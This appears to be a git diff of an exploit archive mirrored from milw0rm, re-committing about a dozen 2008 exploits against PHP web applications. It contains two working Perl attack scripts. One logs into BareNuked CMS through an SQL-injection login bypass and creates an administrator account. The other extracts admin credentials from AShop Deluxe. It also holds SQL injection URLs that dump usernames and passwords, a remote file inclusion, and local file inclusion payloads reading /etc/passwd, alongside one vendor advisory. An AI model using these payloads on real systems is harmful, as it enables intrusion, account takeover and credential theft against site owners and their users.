+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 30 June 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : BareNuked CMS
+#VERSION     : 1.1.0
+#DOWNLOAD    : http://downloads.sourceforge.net/barenuked/barenuked-1.1.0.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#This Exploit will Add user to Administrator's Privilege.
+#
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+#
+# milw0rm.com [2008-06-30]
+
+
+use LWP;
+use HTTP::Request;
+use HTTP::Cookies;
+
+if ($#ARGV + 1 != 4)
+{
+   print "\n==============================================\n";
+   print "  BareNuked CMS Arbitrary Add Admin Exploit   \n";
+   print "                                              \n";
+   print "        Discovered By CWH Underground         \n";
+   print "==============================================\n";
+   print "                                              \n";
+   print "  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O	\n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+   print "                                              \n"; 
+   print "Usage: ./xpl-barenuked.pl    \n";
+   print "Ex. ./xpl-barenuked.pl http://www.target.com/barenuked/ cwh password cwh\@cwh.com\n";
+   exit();
+}
+
+$cmsurl = $ARGV[0];
+$user = $ARGV[1];
+$pass = $ARGV[2];
+$mail = $ARGV[3];
+
+
+$loginurl = $cmsurl."admin/index.php";
+$adduserurl = $cmsurl."admin/users.php";
+$post_content = "name=".$user."&pass=".$pass."&email=".$mail."&rights=admin&mode=create&Submit=New";
+
+print "\n..::Login Page URL::..\n";
+print "[+] $loginurl\n";
+print "\n..::Add User Page URL::..\n";
+print "[+] $adduserurl\n\n";
+
+$ua = LWP::UserAgent->new;
+$ua->cookie_jar(HTTP::Cookies->new);
+
+$request = HTTP::Request->new (POST => $loginurl);
+$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
+$request->content_type ('application/x-www-form-urlencoded');
+$request->content ('username=admin&password=\' or \'a\'=\'a&submit=Log+In');
+
+$response = $ua->request($request);
+
+$content = $response->content;
+
+if ($content =~ /My Webpage Administration/)
+{
+   print "\n!!! Login Success !!!\n\n";
+}
+else
+{
+   print "\n!!! Login Failed !!!\n\n";
+   exit();
+}
+
+$request = HTTP::Request->new (POST => $adduserurl);
+$request->content_type ('application/x-www-form-urlencoded');
+$request->content ($post_content);
+$response = $ua->request($request);
+
+$content = $response->content;
+
+if ($content =~ /$user/)
+{
+   print "\n!!! Exploit Completed !!!\n";
+}
+else
+{
+   print "\n!!! Exploit Failed !!!\n";
+}
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5972.txt b/platforms/php/webapps/5972.txt
index 882f216c5..9146b924c 100755
--- a/platforms/php/webapps/5972.txt
+++ b/platforms/php/webapps/5972.txt
@@ -1,39 +1,39 @@
-##########################################################
-#
-#	RCM Revision Web Development (products.php) SQL Injection Vulnerability
-#
-#	by D3m0n a.k.a Niiub
-#
-#	Home: www.bl4ck-b0x.info
-#
-#	niiub[at]bl4ck-b0x.info
-#
-##########################################################
-
-
-##########################################################
-
-Exploit:
-
-products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
-user_password),6%20from%20users/*
-
-OR
-
-/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
-user_password),6%20from%20users/*
-
-##########################################################
-
-Note: There can by diffrent number of Table, you have to search.
-
-Note2: The admin Panel is www.site.com/admin/ but i can't login with the 
-Password and Login name from the SQL Injection.  :( 
-
-##########################################################
-
-Greetz: dun - sid_psycho - Kacper - Str0ke
-
-###########################################################
-
-# milw0rm.com [2008-06-30]
+##########################################################
+#
+#	RCM Revision Web Development (products.php) SQL Injection Vulnerability
+#
+#	by D3m0n a.k.a Niiub
+#
+#	Home: www.bl4ck-b0x.info
+#
+#	niiub[at]bl4ck-b0x.info
+#
+##########################################################
+
+
+##########################################################
+
+Exploit:
+
+products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
+user_password),6%20from%20users/*
+
+OR
+
+/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name,
+user_password),6%20from%20users/*
+
+##########################################################
+
+Note: There can by diffrent number of Table, you have to search.
+
+Note2: The admin Panel is www.site.com/admin/ but i can't login with the 
+Password and Login name from the SQL Injection.  :( 
+
+##########################################################
+
+Greetz: dun - sid_psycho - Kacper - Str0ke
+
+###########################################################
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5973.php b/platforms/php/webapps/5973.php
index 649d1a240..e41c2313b 100755
--- a/platforms/php/webapps/5973.php
+++ b/platforms/php/webapps/5973.php
@@ -1,114 +1,114 @@
-
-
-# milw0rm.com [2008-06-30]
+
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5974.txt b/platforms/php/webapps/5974.txt
index 33d5dfd42..15e369226 100755
--- a/platforms/php/webapps/5974.txt
+++ b/platforms/php/webapps/5974.txt
@@ -1,41 +1,41 @@
-######################
-#
-#Catviz 0.4.0 beta1 SQL Injection Vulnerability
-#
-######################
-#
-#Bug by: h0yt3r
-#
-#Dork: n/a
-#
-#Homepage: catviz.sourceforge.net
-#
-##
-###
-##
-#
-#This CMS suffers from some not correctly verified variables which are used in SQL Querys.
-#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys.
-#
-#SQL Injection:
-#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
-#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
-#
-#PoC:
-#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
-#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
-#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
-#
-#
-#You get "Go away you nasty intruder wannabe." when you do a wrong login...
-#
-#
-#######################
-#
-#Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u.
-#
-#
-#######################
-####################### 
-
-# milw0rm.com [2008-06-30]
+######################
+#
+#Catviz 0.4.0 beta1 SQL Injection Vulnerability
+#
+######################
+#
+#Bug by: h0yt3r
+#
+#Dork: n/a
+#
+#Homepage: catviz.sourceforge.net
+#
+##
+###
+##
+#
+#This CMS suffers from some not correctly verified variables which are used in SQL Querys.
+#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys.
+#
+#SQL Injection:
+#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL]
+#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]
+#
+#PoC:
+#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/*
+#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
+#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0
+#
+#
+#You get "Go away you nasty intruder wannabe." when you do a wrong login...
+#
+#
+#######################
+#
+#Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u.
+#
+#
+#######################
+####################### 
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5975.txt b/platforms/php/webapps/5975.txt
index da330b981..afff37e68 100755
--- a/platforms/php/webapps/5975.txt
+++ b/platforms/php/webapps/5975.txt
@@ -1,126 +1,126 @@
-netVigilance Security Advisory #40
-
-myBloggie version 2.1.6 Multiple SQL Injection Vulnerability
-Description:
-myBloggie (http://mywebland.com/mybloggie/) is considered one of the 
-most simple, user-friendliest yet packed with features Weblog system 
-available to date. Built using PHP & mySQL, web most popular scripting 
-language & database system enable myBloggie to be installed in any 
-webservers.
-A security problem in the product allows attackers to commit SQL injection.
-External References:
-Mitre CVE: CVE-2007-1899 
-http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899
-NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899
-OSVDB:
-
-Summary:
-myBloggie is weblog system built using PHP & mySQL, the webs most 
-popular scripting language & database system which enable myBloggie to 
-be installed in any webserver.
-
-Successful exploitation requires PHP magic_quotes_gpc set to Off and 
-register_globals set to “On”.
-Advisory URL:
-http://www.netvigilance.com/advisory0040
-
-Release Date: June 30th 2008
-
-Severity/Risk: Medium
-
-CVSS 2.0 Metrics
-Access Vector: Network
-Access Complexity: High
-Authentication: Not-required
-Confidentiality Impact: Partial
-Integrity Impact: Partial
-Availability Impact: Partial
-CVSS 2.0 Base Score: 5.1
-
-Target Distribution on Internet: Low
-
-Exploitability: Functional Exploit
-Remediation Level: Workaround
-Report Confidence: Uncorroborated
-
-Vulnerability Impact: Attack
-Host Impact: SQL Injection.
-
-SecureScout Testcase ID: TC 17969
-
-Vulnerable Systems:
-myBloggie version 2.1.6
-
-Vulnerability Type:
-SQL injection allows malicious people to execute their own SQL scripts. 
-This could be exploited to obtain sensitive data, modify database 
-contents or acquire administrator’s privileges.
-
-Vendor:
-myWebland (http://mywebland.com/)
-
-Vendor Status:
-The Vendor has been notified April 9th 2007, but did not respond.
-Workaround:
-In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off
-
-Example:
-
-SQL Injection Vulnerability 1:
-Create html file with the next content:
-
-
-
-
-
-
-
-
-REQUEST:
-Browse this file and click on the button
-REPLY:
-
    
-Category : 
-[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN 
-PASSWORD]
-Posted By : 1 | 
-Comments[1] |
-
-
-SQL Injection Vulnerability 2:
-
-(SQL Injection + XSS Attack Vulnerability)
-Create html file with the next content and place it for example on 
-http://somedomain.com/file.html:
-
-
-
     
-
    
-
-
-REQUEST:
-Induce a Mybloggie admin to browse the malicious page.
-http:// somedomain.com/file.html
-
-REPLY:
-Page containing username and password for Mybloggie admin account.
-
-
-Credits:
-Jesper Jurcenoks
-Co-founder netVigilance, Inc
-www.netvigilance.com
-
-# milw0rm.com [2008-06-30]
+netVigilance Security Advisory #40
+
+myBloggie version 2.1.6 Multiple SQL Injection Vulnerability
+Description:
+myBloggie (http://mywebland.com/mybloggie/) is considered one of the 
+most simple, user-friendliest yet packed with features Weblog system 
+available to date. Built using PHP & mySQL, web most popular scripting 
+language & database system enable myBloggie to be installed in any 
+webservers.
+A security problem in the product allows attackers to commit SQL injection.
+External References:
+Mitre CVE: CVE-2007-1899 
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899
+NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899
+OSVDB:
+
+Summary:
+myBloggie is weblog system built using PHP & mySQL, the webs most 
+popular scripting language & database system which enable myBloggie to 
+be installed in any webserver.
+
+Successful exploitation requires PHP magic_quotes_gpc set to Off and 
+register_globals set to “On”.
+Advisory URL:
+http://www.netvigilance.com/advisory0040
+
+Release Date: June 30th 2008
+
+Severity/Risk: Medium
+
+CVSS 2.0 Metrics
+Access Vector: Network
+Access Complexity: High
+Authentication: Not-required
+Confidentiality Impact: Partial
+Integrity Impact: Partial
+Availability Impact: Partial
+CVSS 2.0 Base Score: 5.1
+
+Target Distribution on Internet: Low
+
+Exploitability: Functional Exploit
+Remediation Level: Workaround
+Report Confidence: Uncorroborated
+
+Vulnerability Impact: Attack
+Host Impact: SQL Injection.
+
+SecureScout Testcase ID: TC 17969
+
+Vulnerable Systems:
+myBloggie version 2.1.6
+
+Vulnerability Type:
+SQL injection allows malicious people to execute their own SQL scripts. 
+This could be exploited to obtain sensitive data, modify database 
+contents or acquire administrator’s privileges.
+
+Vendor:
+myWebland (http://mywebland.com/)
+
+Vendor Status:
+The Vendor has been notified April 9th 2007, but did not respond.
+Workaround:
+In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off
+
+Example:
+
+SQL Injection Vulnerability 1:
+Create html file with the next content:
+
+
+
    
+
+
    
+
+
+
+REQUEST:
+Browse this file and click on the button
+REPLY:
+
    
+Category : 
+[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN 
+PASSWORD]
+Posted By : 1 | 
+Comments[1] |
+
+
+SQL Injection Vulnerability 2:
+
+(SQL Injection + XSS Attack Vulnerability)
+Create html file with the next content and place it for example on 
+http://somedomain.com/file.html:
+
+
+
     
+
    
+
+
+REQUEST:
+Induce a Mybloggie admin to browse the malicious page.
+http:// somedomain.com/file.html
+
+REPLY:
+Page containing username and password for Mybloggie admin account.
+
+
+Credits:
+Jesper Jurcenoks
+Co-founder netVigilance, Inc
+www.netvigilance.com
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5976.pl b/platforms/php/webapps/5976.pl
index a7e347528..0ec4f45cf 100755
--- a/platforms/php/webapps/5976.pl
+++ b/platforms/php/webapps/5976.pl
@@ -1,96 +1,96 @@
-#usr/bin/perl
-use LWP::UserAgent;
-use HTTP::Cookies;
-use Getopt::Long;
-use URI::Escape;
-#--------------------------------------------------------------------------------------------------------------------------------------------------------
-# [x] AShop Deluxe 4.x Remote SQL inJection Exploit
-# [x] Ditemukan Oleh		: n0c0py - a.k.a 5iR. 4b03D
-# [x] Pada Tanggal		: 27 juni 2008
-# [x] Vendor			: http://www.ashopsoftware.com
-# [x] Laporkan pada vendor	: 28 Juni 2008 - PatCh ada pada veNdoR
-# [x] Dork                  	: -
-# [x] Deskripsi			: AShop Deluxe shopping cart software automates the processing of
-#				  online orders and payments. It is a shopping cart plus an array of
-#				  specialized tools to support various types of products and selling styles. 
-#				  The system automates redundant tasks, organizes data, and simplifies 
-#				  the daily operations of an online store. 
-#--------------------------------------------------------------------------------------------------------------------------------------------------------
-#
-# ===============================================================================================================#
-# Konsep =>
-# => http://victim.com/ashop/catalogue.php?cat=-99/**/union/**/select/**/1,0x76756C6E657261626C65/*
-# => Versi dibawahnya juga memungkinkan memiliki kutu yang sama
-# => password tidak ter-encode membuat eksploitasi semakin mudah
-# [Catatan]
-# n0c0py tidak bertanggung jawab atas penyalahgunaan exploit ini. Greetz:
-# { k1tk4t, Autonux, keboaja, k0il, G1 }
-# yogyafree => yadoy666, Xshadow, Jack, odod, ray16, indounderground, shadow angel dan segenap Tim
-# newhack => fl3xu5, opt1|c, L4in
-# masyarakat hacking indonesia [ yogyafree.net | newhack.org | mainhack.com | echo.or.id | kecoak-elektronik.net ]
-# ================================================================================================================#
- if (@ARGV < 1){
-   
-   print"\nAshop Deluxe 4.x (catalogue.php)";
-   print"\nRemote SQL Injection Exploit       ";
-   print"\ncoded by n0c0py                   ";
-   print"\n";
-   print"\n[!] Penggunaan : perl $0 [Host] [Path] ";
-   print"\n[!] Contoh     : perl $0 127.0.0.1 /ashop       ";
-   print"\n[!] Pilihan    :";
-   print"\n                -p [ip:port]  Proxy support     ";
-   print"\n";
-exit;
-}
-
-print "[+] melakukan eksploitasi...\n";
-
-eksploitasi();
-
-print "\n[+] Bravo!! :D";
-print "\n[+] Eksploitasi Selesai Boss!! :D\n";
-
-sub eksploitasi
-
-{
-  my $host    	= $ARGV[0];
-  my $path    	= $ARGV[1];
-  my %options = ();
-  GetOptions(\%options, "p=s");
-  my $url = "http://".$host.$path."/catalogue.php";
-  my $sploit = "?cat=-99/**/union/**/select/**/1,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a)/**/from/**/user/*";
-  my $exploit= $url.$sploit;
-  my $ua = LWP::UserAgent->new();
-  my $res = "";
-  my $content="";
-  my $regex = "";
-  if($options{"p"})
-  {
-    $ua->proxy('http', "http://".$options{"p"});
-  }
-#[------------------------------]
-#   Apakah file eksis?
-#[------------------------------]
-$res = $ua->get($url);
-  if(!$res->is_success)
-  {
-    print("[+] Gagal! file tidak ditemukan!\n");
-    print $res->status_line();
-  }
-#[-------------------------]
-#      Eksploitasi
-#[-------------------------]
-  $res = $ua->get($exploit);
-  $content = $res->content;
-if ($content =~ /:::(.+):::/)
-{
-$regex=$1;
-($pengguna,$password)= split('::',$regex);
-printf " [x]nama admin = $pengguna \n [x]password admin = $password\n";
-}
-else { die "Gagal mengeksploitasi :p \n";
-}
-
-}
-
-# milw0rm.com [2008-06-30]
+#usr/bin/perl
+use LWP::UserAgent;
+use HTTP::Cookies;
+use Getopt::Long;
+use URI::Escape;
+#--------------------------------------------------------------------------------------------------------------------------------------------------------
+# [x] AShop Deluxe 4.x Remote SQL inJection Exploit
+# [x] Ditemukan Oleh		: n0c0py - a.k.a 5iR. 4b03D
+# [x] Pada Tanggal		: 27 juni 2008
+# [x] Vendor			: http://www.ashopsoftware.com
+# [x] Laporkan pada vendor	: 28 Juni 2008 - PatCh ada pada veNdoR
+# [x] Dork                  	: -
+# [x] Deskripsi			: AShop Deluxe shopping cart software automates the processing of
+#				  online orders and payments. It is a shopping cart plus an array of
+#				  specialized tools to support various types of products and selling styles. 
+#				  The system automates redundant tasks, organizes data, and simplifies 
+#				  the daily operations of an online store. 
+#--------------------------------------------------------------------------------------------------------------------------------------------------------
+#
+# ===============================================================================================================#
+# Konsep =>
+# => http://victim.com/ashop/catalogue.php?cat=-99/**/union/**/select/**/1,0x76756C6E657261626C65/*
+# => Versi dibawahnya juga memungkinkan memiliki kutu yang sama
+# => password tidak ter-encode membuat eksploitasi semakin mudah
+# [Catatan]
+# n0c0py tidak bertanggung jawab atas penyalahgunaan exploit ini. Greetz:
+# { k1tk4t, Autonux, keboaja, k0il, G1 }
+# yogyafree => yadoy666, Xshadow, Jack, odod, ray16, indounderground, shadow angel dan segenap Tim
+# newhack => fl3xu5, opt1|c, L4in
+# masyarakat hacking indonesia [ yogyafree.net | newhack.org | mainhack.com | echo.or.id | kecoak-elektronik.net ]
+# ================================================================================================================#
+ if (@ARGV < 1){
+   
+   print"\nAshop Deluxe 4.x (catalogue.php)";
+   print"\nRemote SQL Injection Exploit       ";
+   print"\ncoded by n0c0py                   ";
+   print"\n";
+   print"\n[!] Penggunaan : perl $0 [Host] [Path] ";
+   print"\n[!] Contoh     : perl $0 127.0.0.1 /ashop       ";
+   print"\n[!] Pilihan    :";
+   print"\n                -p [ip:port]  Proxy support     ";
+   print"\n";
+exit;
+}
+
+print "[+] melakukan eksploitasi...\n";
+
+eksploitasi();
+
+print "\n[+] Bravo!! :D";
+print "\n[+] Eksploitasi Selesai Boss!! :D\n";
+
+sub eksploitasi
+
+{
+  my $host    	= $ARGV[0];
+  my $path    	= $ARGV[1];
+  my %options = ();
+  GetOptions(\%options, "p=s");
+  my $url = "http://".$host.$path."/catalogue.php";
+  my $sploit = "?cat=-99/**/union/**/select/**/1,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a)/**/from/**/user/*";
+  my $exploit= $url.$sploit;
+  my $ua = LWP::UserAgent->new();
+  my $res = "";
+  my $content="";
+  my $regex = "";
+  if($options{"p"})
+  {
+    $ua->proxy('http', "http://".$options{"p"});
+  }
+#[------------------------------]
+#   Apakah file eksis?
+#[------------------------------]
+$res = $ua->get($url);
+  if(!$res->is_success)
+  {
+    print("[+] Gagal! file tidak ditemukan!\n");
+    print $res->status_line();
+  }
+#[-------------------------]
+#      Eksploitasi
+#[-------------------------]
+  $res = $ua->get($exploit);
+  $content = $res->content;
+if ($content =~ /:::(.+):::/)
+{
+$regex=$1;
+($pengguna,$password)= split('::',$regex);
+printf " [x]nama admin = $pengguna \n [x]password admin = $password\n";
+}
+else { die "Gagal mengeksploitasi :p \n";
+}
+
+}
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5980.txt b/platforms/php/webapps/5980.txt
index 13fd3389c..d75077d64 100755
--- a/platforms/php/webapps/5980.txt
+++ b/platforms/php/webapps/5980.txt
@@ -1,49 +1,49 @@
-###########################################
-#                                         #
-# Mambo Component n-gallery SQL Injection #
-#                                         # 
-###########################################
-#                                         #
-##Author : AlbaniaN-[H]                   # 
-#                                         #
-###Site : http://www.khg-crew.ws          #
-#                                         #
-####Home Page : http://www.vaalon.org     #
-#                                         #
-#####Email : valion@khg-crew.ws           #
-#                                         #
-###########################################
-#                                         #
-# DORK : allinurl:"com_n-gallery"         #
-#                                         #  
-###########################################
-#                                         #
-##############################################################################################################################################################
-#            #                                                                                                                                               #
-#Exploit 1 : #                                                                                                                                               #
-#            #################################################################################################################################################
-#                                                                                                                                                            #
-# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--                                              #
-#                                                                                                                                                            #
-##############################################################################################################################################################
-#            #                                                                                                                                               #
-#Exploit 2 : #                                                                                                                                               #
-#            #################################################################################################################################################
-#                                                                                                                                                            #
-# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* #
-#                                                                                                                                                            #
-##############################################################################################################################################################
-#          Kosova Hackers Group           # 
-###########################################
-#             AlbaniaN-[H]                #
-###########################################
-#         Republic of Kosova (K)          # 
-###########################################
-#      Greetings to: urtan,redc00de       # 
-###########################################
-#    & all Kosova Hackers Group           # 
-###########################################
-#&all muslim peoples all over the world :)#
-###########################################
-
-# milw0rm.com [2008-06-30]
+###########################################
+#                                         #
+# Mambo Component n-gallery SQL Injection #
+#                                         # 
+###########################################
+#                                         #
+##Author : AlbaniaN-[H]                   # 
+#                                         #
+###Site : http://www.khg-crew.ws          #
+#                                         #
+####Home Page : http://www.vaalon.org     #
+#                                         #
+#####Email : valion@khg-crew.ws           #
+#                                         #
+###########################################
+#                                         #
+# DORK : allinurl:"com_n-gallery"         #
+#                                         #  
+###########################################
+#                                         #
+##############################################################################################################################################################
+#            #                                                                                                                                               #
+#Exploit 1 : #                                                                                                                                               #
+#            #################################################################################################################################################
+#                                                                                                                                                            #
+# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users--                                              #
+#                                                                                                                                                            #
+##############################################################################################################################################################
+#            #                                                                                                                                               #
+#Exploit 2 : #                                                                                                                                               #
+#            #################################################################################################################################################
+#                                                                                                                                                            #
+# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* #
+#                                                                                                                                                            #
+##############################################################################################################################################################
+#          Kosova Hackers Group           # 
+###########################################
+#             AlbaniaN-[H]                #
+###########################################
+#         Republic of Kosova (K)          # 
+###########################################
+#      Greetings to: urtan,redc00de       # 
+###########################################
+#    & all Kosova Hackers Group           # 
+###########################################
+#&all muslim peoples all over the world :)#
+###########################################
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5981.txt b/platforms/php/webapps/5981.txt
index bb9e2c556..38569d3aa 100755
--- a/platforms/php/webapps/5981.txt
+++ b/platforms/php/webapps/5981.txt
@@ -1,24 +1,24 @@
-################################################################################
- HBR 1.3 (hm) Remote File Inclusion Vulnerability
-################################################################################
-[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
-[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
-[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
-[~] Script : HBR 1.3
-[~] Download Script : http://www.hscripts.com/scripts/php/downloads/HBR_1_3.zip
-################## [ I love the Messenger of Allah Mohammad ] ##################
-[~] Error ( hioxBannerRotate.php ) :
-include "$hm/admin/props.php";
-
-[~] Exploit :
-http://xxxx/[Path]/hioxBannerRotate.php?hm=[Evil]
-################## [ I love the Messenger of Allah Mohammad ] ##################
-[~] Gootz :
-PROTO & Night Mare & Mr.PaTcH & Aseg-Rabe7 & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
-Mr.JUVE & Mr.hope & LeGeNd HaCkEr & My Blog [ gh0st10.wordpress.com ] ..
-All Member Real Hack & All My Friends And All Muslims Hackers ..
-################################################################################
- Real Hack Team ( R-H ) ..
-################################################################################
-
-# milw0rm.com [2008-06-30]
+################################################################################
+ HBR 1.3 (hm) Remote File Inclusion Vulnerability
+################################################################################
+[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
+[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
+[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
+[~] Script : HBR 1.3
+[~] Download Script : http://www.hscripts.com/scripts/php/downloads/HBR_1_3.zip
+################## [ I love the Messenger of Allah Mohammad ] ##################
+[~] Error ( hioxBannerRotate.php ) :
+include "$hm/admin/props.php";
+
+[~] Exploit :
+http://xxxx/[Path]/hioxBannerRotate.php?hm=[Evil]
+################## [ I love the Messenger of Allah Mohammad ] ##################
+[~] Gootz :
+PROTO & Night Mare & Mr.PaTcH & Aseg-Rabe7 & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
+Mr.JUVE & Mr.hope & LeGeNd HaCkEr & My Blog [ gh0st10.wordpress.com ] ..
+All Member Real Hack & All My Friends And All Muslims Hackers ..
+################################################################################
+ Real Hack Team ( R-H ) ..
+################################################################################
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5982.txt b/platforms/php/webapps/5982.txt
index adcc29f0a..123593b4b 100755
--- a/platforms/php/webapps/5982.txt
+++ b/platforms/php/webapps/5982.txt
@@ -1,15 +1,15 @@
-@~~===========================================~~@
-|  Author => StAkeR ~ StAkeR@hotmail.it         |  
-@~~===========================================~~@ 
-+                                                
-@~~==========================================================================~~@
-|  Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability               |
-@~~==========================================================================~~@
-|  index.php?page=../../../../../../../etc/passwd%00
-@~~==========================================================================~~@
-+
-@~~=============================================================================~~@
-|  http://dfn.dl.sourceforge.net/sourceforge/php-agenda/php-agenda-2.2.4.tar.gz   |
-@~~=============================================================================~~@  
-
-# milw0rm.com [2008-07-01]
+@~~===========================================~~@
+|  Author => StAkeR ~ StAkeR@hotmail.it         |  
+@~~===========================================~~@ 
++                                                
+@~~==========================================================================~~@
+|  Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability               |
+@~~==========================================================================~~@
+|  index.php?page=../../../../../../../etc/passwd%00
+@~~==========================================================================~~@
++
+@~~=============================================================================~~@
+|  http://dfn.dl.sourceforge.net/sourceforge/php-agenda/php-agenda-2.2.4.tar.gz   |
+@~~=============================================================================~~@  
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5983.txt b/platforms/php/webapps/5983.txt
index 58f8fa91e..c5a30c6ef 100755
--- a/platforms/php/webapps/5983.txt
+++ b/platforms/php/webapps/5983.txt
@@ -1,15 +1,15 @@
-@~~===========================================~~@
-|  Author => StAkeR ~ StAkeR@hotmail.it         |  
-@~~===========================================~~@ 
-+                                                
-@~~==========================================================================~~@
-|  CAT2 <= 1.Local File Inclusion Vulnerability                                |
-@~~==========================================================================~~@
-|  objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00    |
-@~~==========================================================================~~@
-+
-@~~====================================================~~@
-|  http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip   |               
-@~~====================================================~~@
-
-# milw0rm.com [2008-07-01]
+@~~===========================================~~@
+|  Author => StAkeR ~ StAkeR@hotmail.it         |  
+@~~===========================================~~@ 
++                                                
+@~~==========================================================================~~@
+|  CAT2 <= 1.Local File Inclusion Vulnerability                                |
+@~~==========================================================================~~@
+|  objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00    |
+@~~==========================================================================~~@
++
+@~~====================================================~~@
+|  http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip   |               
+@~~====================================================~~@
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5984.txt b/platforms/php/webapps/5984.txt
index 216e994c2..0074f9b9d 100755
--- a/platforms/php/webapps/5984.txt
+++ b/platforms/php/webapps/5984.txt
@@ -1,59 +1,59 @@
-=================================================================
-  Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
-=================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 1 July 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : Sisplet CMS
- VERSION     : 2008-01-24
- VENDOR      : http://cms.sisplet.org/
- DOWNLOAD    : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
------------------------------------
- Vulnerable File (function.php)
------------------------------------
-
-$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");
-
-
----------
- Exploit
----------
-
